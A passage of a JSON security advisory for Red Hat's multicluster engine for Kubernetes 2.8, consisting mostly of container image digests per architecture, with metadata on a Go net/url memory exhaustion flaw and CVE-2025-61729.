"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang: net/url: Memory exhaustion in query parameter parsing in net/url"
},
{
"cve": "CVE-2025-61729",
"cwe": {
"id": "CWE-1050",
"name": "Excessive Platform Resource Consumption within a Loop"
},
"discovery_date": "2025-12-02T20:01:45.330964+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
